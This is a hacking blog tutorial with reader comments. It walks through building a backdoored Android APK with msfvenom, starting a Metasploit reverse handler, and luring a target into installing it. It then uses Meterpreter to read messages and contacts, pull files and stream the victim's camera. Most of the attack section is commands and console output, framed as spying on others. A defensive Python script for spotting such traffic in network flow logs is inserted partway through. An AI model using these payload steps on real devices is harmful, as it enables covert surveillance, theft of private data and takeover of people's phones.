Android is the most popular mobile platform, and as its user base grows day by day, so do the security threats against it. Android phones are vulnerable and can be easily backdoored. Metasploit is the best tool in Kali Linux for generating and handling payloads. It has more than 1000 exploits, which is more than enough. Here we use Metasploit to hack Android: we create a backdoored package with msfvenom, and executing the APK on the target device gives a reverse Meterpreter shell.






1. Metasploit framework


It is pre-installed in Kali. If you don't find it, download and install it with the following command:


# apt-get install metasploit-framework


Generating Payload (.apk)

The msfpayload command used to be the normal way to generate a payload; since Kali 2.0, msfvenom is used instead.

# msfvenom -p android/meterpreter/reverse_tcp --platform android LHOST=<attacker IP> LPORT=444 -o /root/Desktop/payload.apk


An APK will be generated on the desktop. The attacker IP can be your local IP, but if the target is on the WAN (anywhere on the internet), provide your external IP and forward port 444 on your router.
Want to know how Android is hacked over dynamic DNS via WAN? Follow this thread on –
# msfvenom -p android/meterpreter/reverse_tcp --platform android LHOST= LPORT=444 -o /root/Desktop/payload.apk
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8496 bytes
Saved as: /root/Desktop/payload.apk


Setting up reverse handler

Now start the msf reverse handler on your Kali machine. Fire up Metasploit:

# msfconsole

Wait a minute for msfconsole to come up. Then select the handler and set the payload and options.

1. Handler

msf> use multi/handler

2. Set payload

msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST <attacker ip>

5. Exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler…


Executing the payload on Target

To make the reverse connection, the payload has to be executed on the target device. If you have direct access to the target device, copy the APK you created onto it and install it. Otherwise, upload it to some server, give the target the link, and get them to install the APK.

Now come back to our handler. If the target has executed it, a meterpreter shell will be spawned. Now you are the owner of the system!

[*] Started reverse handler on
[*] Starting the payload handler…
[*] Sending stage (56173 bytes) to
[*] Meterpreter session 1 opened ( -> at 2015-12-08 04:50:59 -0500
meterpreter >
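
Seen from the network side, the session above is a handset dialing out to the listener port and then pulling down a stage (56173 bytes in the output). The following is an added example, not part of the original post, that triages flow records for that pattern; the log format, the handset subnet, the port allow-list and the byte threshold are all assumptions.

```python
import csv
import io
import ipaddress

# Constructed flow records (not from the original post); documentation and
# private address ranges only. Columns: time, src, dst, dst_port, bytes_in
SAMPLE_FLOWS = """\
2015-12-08T04:50:41,192.168.1.23,203.0.113.10,443,18234
2015-12-08T04:50:59,192.168.1.23,198.51.100.7,444,56173
2015-12-08T04:51:10,192.168.1.40,203.0.113.10,5228,912
2015-12-08T04:52:02,192.168.1.40,192.168.1.5,444,60110
2015-12-08T04:52:40,192.168.1.23,198.51.100.9,8080,300
2015-12-08T04:53:30,10.0.0.8,198.51.100.7,444,56173
"""

HANDSET_NET = ipaddress.ip_network("192.168.1.0/24")  # assumed Wi-Fi segment for phones
ALLOWED_PORTS = {80, 443, 5228}  # assumed egress allow-list for handsets
STAGE_MIN_BYTES = 50_000         # assumed threshold near the 56173-byte stage


def suspicious_flows(log_text):
    """Return (reason, flow) pairs for handset-initiated flows worth triage."""
    hits = []
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) != 5:
            continue  # skip malformed lines instead of crashing
        ts, src, dst, dport, bytes_in = row
        try:
            src_ip = ipaddress.ip_address(src)
            port, received = int(dport), int(bytes_in)
        except ValueError:
            continue  # unparsable address or number
        if src_ip not in HANDSET_NET or port in ALLOWED_PORTS:
            continue
        # A reverse_tcp stager connects out, then receives the stage from the
        # handler, whether the handler sits on the LAN or across the WAN.
        big = received >= STAGE_MIN_BYTES
        reason = "stage-sized download" if big else "unexpected port"
        hits.append((reason, (ts, src, dst, port, received)))
    return hits


if __name__ == "__main__":
    for reason, flow in suspicious_flows(SAMPLE_FLOWS):
        print(reason, *flow)
```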

Now you can read messages, contacts and the call log, access the camera and mic, and upload and download files.

Use the help command for more options:

meterpreter > help

The part I find most interesting is spying through the camera.


meterpreter > webcam_stream

This command gives you a live stream from the main camera. Even though the frame rate is low, you can spy on them like in a James Bond movie. You can also spy through the front camera or the secondary camera with the command


meterpreter > webcam_stream 2

Happy hacking !

Susmith Krishnan

I’m basically a computer enthusiast and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16, and I would like to explore security vulnerabilities and the latest tech news and share them with you.


Viviana Soderquist · July 8, 2016 at 9:47 am

whoah this blog is wonderful i really like reading your posts. Stay up the great paintings! You realize, many individuals are hunting around for this info, you can help them greatly.

    admin · July 8, 2016 at 10:10 am

    Thank you. I know the struggle being a noob in hacking, so I thought of sharing what I have got. Pls keep sharing 🙂

shasi · July 8, 2016 at 7:16 pm

This blog is awesome for noobs… I created the payload app, but it is not installing on my Sony S mobile… it shows app not installed. How to overcome this problem?

    susmith HCK · July 8, 2016 at 10:39 pm

    Some phones have this trouble. I'm researching it. Some devices prevent installation from unknown sources.

Shasi · July 8, 2016 at 11:06 pm

Some mobiles are accepting the installation. I have installed it on one mobile and started the exploit, but it got stuck on starting the payload handler… the victim mobile is connected to the WLAN network but the payload is not working… is there any fault… I'm using the local IP address… how to find the external IP address… any solution for this?

    susmith HCK · July 11, 2016 at 11:27 am

    problem with the kali machine?

Dem · November 16, 2016 at 6:10 am

If you deleted the APK file on your mobile, does the backdoor/payload still affect the Android mobile?

    susmith HCK · November 16, 2016 at 5:30 pm

    No. Once it's deleted, it won't affect it anymore.

conrad · December 7, 2016 at 5:06 am

Does it support Ubuntu 16.04? Because every time I tried to install metasploit in the terminal I got an error "Unable to locate package metasploit-framework".

madhavan · October 15, 2017 at 7:41 pm

Bro, my phone runs on Android 4.2.1 Jelly Bean, and the app that I created doesn't work on it… please help me out!

Elliot · November 6, 2017 at 8:59 pm

I followed the steps and reached the step where the Meterpreter session is opened, after running the payload app on the mobile. But thereafter, it gets stuck. The meterpreter console doesn’t show up as shown in the video and images. So, I can’t move further.
